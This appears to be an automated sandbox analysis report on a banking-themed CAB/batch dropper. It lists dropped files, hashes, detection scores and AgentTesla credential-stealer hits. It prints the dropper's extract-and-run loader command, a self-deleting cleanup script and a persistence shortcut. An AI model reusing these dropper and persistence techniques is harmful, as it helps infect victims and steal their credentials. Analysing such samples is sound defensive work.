                                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxXSjA+ov:HRYFVmTWDyzPtZExC8+y
                                                                                                                              MD5:CC20459CE5C31054021AE4128AECBC73
                                                                                                                              SHA1:F19D8064095980B32DB86CD0F079BE9D5D24AF37
                                                                                                                              SHA-256:1E16EA7CECB7DF03A105C406FF7043EE35481E2EB7453FBC597DFAB67E06B7D9
                                                                                                                              SHA-512:143F54820BC9F6BE7D50D683A693163C3CAACCCDB97162050FAD880DC50033482CF08E420FBC5960E27577173E81DDCEE2A440455D88F6484C3C8FA62F832109
                                                                                                                              Malicious:true
                                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=935796..HotKey=87..
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):236544
                                                                                                                              Entropy (8bit):6.4416694948877025
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):18944
                                                                                                                              Entropy (8bit):5.742964649637377
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                              MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                              SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                              SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                              SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.379184608538005
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:bWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPlyus:bLHyIFKL3IZ2KRH9Ougws
                                                                                                                              MD5:5C7E537A8382F2DE0FC0A560E686028F
                                                                                                                              SHA1:36DCD7B4471FEC414AF98E3B5E6F0051C74556F4
                                                                                                                              SHA-256:4E0AAE659414F24EEC6675C8EA7490DEA7B410F2D55DF551779A1157035D3992
                                                                                                                              SHA-512:DFCFAF05AB08BD29B6747E0FACDDFAEF0E9539DA456F09809DEA2E813DC4808A3FAF895C24F4CB5A0C6E974B86778D79D945A9A204830C5D07D829DBBEE23475
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):250368
                                                                                                                              Entropy (8bit):5.008874766930935
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                                              MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                                              SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                                              SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                                              Malicious:true
                                                                                                                              Yara Hits:
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):231936
                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):164
                                                                                                                              Entropy (8bit):5.01536063413633
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:mKDDCMNvFbuov3DCHyg4E2J5xAIJWAdEFKDwU1hGDCHyg4E2J5xAInTRI5bRoyI9:hWKdbuoLCHhJ23fJWAawDNeCHhJ23fTZ
                                                                                                                              MD5:E5D94F5D240B2F5811254BEF4DE245B3
                                                                                                                              SHA1:538E28FA95D5787191F9F1DEA7998ED0B5923D2F
                                                                                                                              SHA-256:6528C3BBDC1FA7D06FF4DE1069866724ACA17A3E26827ACD9F91B668E756B346
                                                                                                                              SHA-512:29B8E63AF5CE4BB55BA6CA5F5CEA810BC1C567E641577BBEED179FDA55F6943FE37328C3AFCB20D6712B55219D17DD09E7F80FDCCC74987E225E7B4710775283
                                                                                                                              Malicious:false
                                                                                                                              Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp692E.tmp.cmd" /f /q..
                                                                                                                              Process:C:\Windows\System32\extrac32.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1056768
                                                                                                                              Entropy (8bit):6.917170198806807
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:/GBqWzMJ3rInJFhR1T6a3R6ZFlR+gKT44VoIOL7zk:/CHnca8YL6L
                                                                                                                              MD5:BDC3B662D1136F20F51F55A0F6A2FB9D
                                                                                                                              SHA1:EF8BAAD4F0F3F96E2D04F3C6CEA1471BCD651008
                                                                                                                              SHA-256:23B47A050614D71D7081F8E0313C972E9E6B1DF6C9EEC10F59B6EE06D0506EC9
                                                                                                                              SHA-512:29036CED934C7668B072C811285761A2B4CDD562B2D269E50BE767E8BE27589117E84BF0F34B0323912A3DEA4545DAB9B9E5A6046C8BEB36D15EF65056A88AD8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................:......\.............@..............................................@...........................`...%... ..........................Tj...................................................f...............................text............................... ..`.itext.............................. ..`.data...H...........................@....bss.....6... ...........................idata...%...`...&..................@....tls....4............*...................rdata...............*..............@..@.reloc..Tj.......l...,..............@..B.rsrc........ ......................@..@..................... ..............@..@................................................................................................
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12320
                                                                                                                              Entropy (8bit):7.984293522539444
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:sIHZNpCiwH2TT4B/rHTIsoy7VnBji5o9T:V5uHbFLTIsk6
                                                                                                                              MD5:EBAD11B1BF6025C8D74B45C5A3DD7011
                                                                                                                              SHA1:19B5585D25398E5774156168E7236241C0897D8F
                                                                                                                              SHA-256:F21081BA6C12DD01E5FB7781CBBB084FF9DF4A2E009004E8E81B7274A08CA009
                                                                                                                              SHA-512:0CEF2A0E54C14DFE71ECFE403ECDF1D0BEAB26076409AA44B4FFAF5346D870FF1BC430F6FF5957B50D8B2BF9A1C7B31A1B2257FA37AFE68090C0632192028077
                                                                                                                              Malicious:false
                                                                                                                              Preview:8K.z.}<5........0.f....3..?...w..?....S.2.@.l.V..B.....dS.......4H9.._..1f..)~*..o..v.U?.....{.^-F5M{.;./Ek[F./.eh..5...Zb.S#{j...,...9]b(..>.?.)a....c.H.oz.kz.scU.....{......+5JE.O.......F@'O)..r...L..... ...>...."#c..'.tP..]....,.+..j...F........\...CB..|".\|pD.xq..4..<..]m.FT(J..[lq.../5.Y....*. |.....7....Bz....S....O...)D..........o...@sG.z...M.M...P.q..Z..De.!.5y."v...j...k..y.9....l.o]...~.0....v..h....".Q..?.q".C....'.m.o.-'_.Uj.6.g(..J..V.........>..i_9._.[.DE|...P...K...Y......{l....|.5...0.a$*.qTh..s..-..Y...5..^$...Y..H8..7...R..K.w..........|e..{.Tj...8pd"f/...I%.[F..}.*....l..^..v.....1..,F.;.<.OI.fP....0n.T...}......Kc.....2.....bO..|:E...M*C.DvUoGC.;.....DA.1..$.p..l.O..).E$.R..."...).s.~-.m.i.Z.?,/.........@P..%$RJk....(.9L.$....N../@.dY.wO@".E....~.y%]9...........j.K..M........"6...y.,..3i..NN..+.3.LH.=I..6..3..._v......-...Ak.*&....\.Jlip.d.39.6.s.q...>...=...M..(pF$...|.../..4<....9.^m..k......K..A.8...'D..69C..ws|
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):231936
                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Nov 11 16:02:35 2024, mtime=Mon Nov 11 16:02:35 2024, atime=Mon Nov 11 16:02:32 2024, length=231936, window=
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1794
                                                                                                                              Entropy (8bit):3.508764686120447
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8bHz3zc+6eMk5UAGas4FSnclwO4ZTqlzK2m:8bHz3I+59Gb4+clwZTqlm2
                                                                                                                              MD5:93425BE724A285D48B946D910C576490
                                                                                                                              SHA1:B3E042FC280BD7CE465443410A697577CAF07600
                                                                                                                              SHA-256:F05945FF18A99E0D6CC476A7593B30FC6F4265EFBD0AE9B77DEDE76E1A72E58C
                                                                                                                              SHA-512:67108537C37615B1C0F9FBC98D79D41E8137C51B95B62EC028B00FEE1E60B3218921699427BA85056EF891D20DC03F98FACE8C8A233F329B09C2897031C06300
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...D9D.[4..D9D.[4...z.[4............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....@.v[4....H.[4......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BkYK...........................d...A.p.p.D.a.t.a...B.V.1.....kYP...Roaming.@......EW)BkYP.............................#.R.o.a.m.i.n.g.....T.1.....kYR...ACCApi..>......kYR.kYR......)......................t.A.C.C.A.p.i.....l.2.....kYQ. .TROJAN~1.EXE..P......kYR.kYR......)....................:...T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........T.L......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):593
                                                                                                                              Entropy (8bit):4.628389634375338
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:qQ/xTzP1eSbZ7u0wxDDDDDDDDjCaY52oOaYAUoOTB8NGNY:X/xTzdp7u0wQak2oOaOoOt8N/
                                                                                                                              MD5:D8B0A0FDC93BB619557ECFFC38C0ABDA
                                                                                                                              SHA1:557FE7D2A3008C6D146098A15DD6839EE87862D1
                                                                                                                              SHA-256:852F384651C1D8A80584BCFAE2B38379B1DFF9A164538E6F2C7C4C03E4F2F6C7
                                                                                                                              SHA-512:6FFC475EB0349099F2BD1E32BF3F04CA73724F619C7087926B35041803C1EBECC4FA8872071CAC192360690B0DDC0A2F602AD1EC91BFE80FAE5EE589BE801675
                                                                                                                              Malicious:false
                                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x102000 (1056768) (1 MB)....Total bytes written = 0x102000 (1056768) (1 MB).......Operation completed successfully in 0.125 seconds.....
                                                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):66
                                                                                                                              Entropy (8bit):4.524640141725149
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                              MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                              SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                              SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                              SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                              Malicious:false
                                                                                                                              Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                              File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 33 datablocks, 0 compression
                                                                                                                              Entropy (8bit):6.916845207965399
                                                                                                                              TrID:
                                                                                                                              • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                              File name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
                                                                                                                              File size:1'057'171 bytes
                                                                                                                              MD5:9096921da7521dd3a36a5fb35fc84fa9
                                                                                                                              SHA1:bcf834c98de442f75b21e053c3b9d893aebb5b24
                                                                                                                              SHA256:769f8dac244efda700b8d9e966a8b33c4b27aa8180d7898f9a829210076d3066
                                                                                                                              SHA512:0ff8a592c16a8e01bc9165b10cdbadb9f70e7ff44547245f40456e4f293fbb3c3f87db63db39fd18874f182dcbd8d16333c6d2203dc242f805941375cf7d0805
                                                                                                                              SSDEEP:24576:oGBOWvM13rIn9hVR1X6+3p6ZdllagKT8URocOL7zk:oC7n0+EYzaL
                                                                                                                              TLSH:BE259E75F6784C66D03B65798CCE67AED82C7B782929B4C326F54B392A39284340FC53
                                                                                                                              File Content Preview:MSCF............u.......................!.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe"..... ............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                                              Icon Hash:9686878b929a9886
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-11T18:02:28.043830+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706198.252.105.91443TCP
